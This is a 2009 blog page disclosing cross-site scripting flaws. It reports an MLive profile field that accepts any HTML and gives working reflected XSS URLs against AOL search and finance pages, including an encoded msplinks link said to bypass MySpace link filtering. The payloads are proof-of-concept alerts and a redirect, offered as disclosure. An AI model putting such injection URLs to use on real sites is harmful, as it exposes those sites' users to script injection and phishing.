skip to main | skip to sidebar

XSS - Cross-Site Scripting

And Other Web Related Deception

This site is soon to be deprecated by http://www.johnleitch.net

Monday, November 2, 2009

Free Rein - MLive.com

MLive's profile system has no XSS protection. HTML of any sort can be entered in the About Me field.

http://connect.mlive.com/user/XSSBlog/index.html

Posted by John Leitch at 1:47 PM 0 comments

Labels: ASCII, cross-site scripting, hacking, html, javascript, persistent xss, social engineering, type 2 xss, web development, xss

More Reflected XSS - AOL.com

More of the same.

http://messageboards.aol.com/aol/en_us/search.php?search="style="position:absolute;top:0;left:-500px;width:9999px;height:9999px;"onmouseover="alert(0)&boardId=519911&search_all=0&search_type=2

http://finance.aol.com/lookup/"style="width:9999px;height:9999px;"onmouseover="alert(0)">/usa

And of course being a myspace white listed site these can be used to get around msplinks.

http://www.msplinks.com/MDFodHRwOi8vbWVzc2FnZWJvYXJkcy5hb2wuY29tL2FvbC9lbl91cy9zZWFyY2gucGhwP3NlYXJjaD0lMjJzdHlsZT0lMjJwb3NpdGlvbjphYnNvbHV0ZTt0b3A6MDtsZWZ0Oi01MDBweDt3aWR0aDo5OTk5cHg7aGVpZ2h0Ojk5OTlweDslMjJvbm1vdXNlb3Zlcj0lMjJ3aW5kb3cubG9jYXRpb249J2h0dHA6Ly9jcm9zcy1zaXRlLXNjcmlwdGluZy5ibG9nc3BvdC5jb20nJmJvYXJkSWQ9NTE5OTExJnNlYXJjaF9hbGw9MCZzZWFyY2hfdHlwZT0y

Posted by John Leitch at 1:28 PM 3 comments

Labels: AOL, hacking, html, javascript, msplinks.com, phishing, programming, social engineering, Type 1 XSS, web development

Newer Posts Older Posts Home

Subscribe to: Posts (Atom)

About Me

John Leitch

View my complete profile

Blog Archive

► 2010 (71)
- ► July (28)
- ► June (2)
- ► May (27)
- ► April (7)
- ► March (7)

▼ 2009 (20)
- ▼ November (2)
  - Free Rein - MLive.com
  - More Reflected XSS - AOL.com
- ► October (1)
- ► September (6)
- ► August (2)
- ► June (3)
- ► May (6)

Blog Catalog

Computer Security Blogs - BlogCatalog Blog Directory

Blogflux

Blog Flux Local - Michigan

Blogged

Programming Blog Directory

Blogville